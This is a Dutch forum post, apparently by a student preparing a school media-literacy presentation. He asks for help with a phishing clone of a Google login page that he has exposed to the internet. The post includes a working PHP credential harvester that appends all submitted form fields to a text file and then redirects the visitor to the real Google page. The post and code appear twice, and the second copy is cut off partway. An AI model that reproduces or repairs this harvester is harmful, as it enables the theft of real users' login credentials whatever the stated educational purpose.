Beste,
Voor mediawijsheid moeten wij dit jaar en ook tevens het laatste jaar afronden met een presentatie. In de presentatie moet je iets behandelen wat dit jaar aanbod is gekomen en het uitwerken.
Ik ben dit aan het doen met een phishing site. Ik heb voor de google inlog pagina gekozen en expres voor de overjarige. Dit doe ik omdat er dan geen misbruik kan van worden gemaakt.
Ik heb mij site om mijn localhost gezet (Xampp) en verder op het web gezet met burrow.io.
Alleen heb ik een probleem. Ik heb mijn post.php en html af. Maar de ingevulde gegevens komen niet in mijn "usernames.txt".
Ik heb dus vernomen dat ik geen schrijfrechten zijn naar mijn usernames.txt. Hoe los ik dit op?
Want ik heb de presentatie morgen om 13:00.
Als iemand mij kan helpen waardeer ik het erg
Groet,
Lars hendriksen
<?php
header ('Location:https://accounts.google.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Voor mediawijsheid moeten wij dit jaar en ook tevens het laatste jaar afronden met een presentatie. In de presentatie moet je iets behandelen wat dit jaar aanbod is gekomen en het uitwerken.
Ik ben dit aan het doen met een phishing site. Ik heb voor de google inlog pagina gekozen en expres voor de overjarige. Dit doe ik omdat er dan geen misbruik kan van worden gemaakt.
Ik heb mij site om mijn localhost gezet (Xampp) en verder op het web gezet met burrow.io.
Alleen heb ik een probleem. Ik heb mijn post.php en html af. Maar de ingevulde gegevens komen niet in mijn "usernames.txt".
Ik heb dus vernomen dat ik geen schrijfrechten zijn naar mijn usernames.txt. Hoe los ik dit op?
Want ik heb de presentatie morgen om 13:00.
Als iemand mij kan helpen waardeer ik het erg
Groet,
Lars hendriksen
<?php
header ('Location:https://accounts.google.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}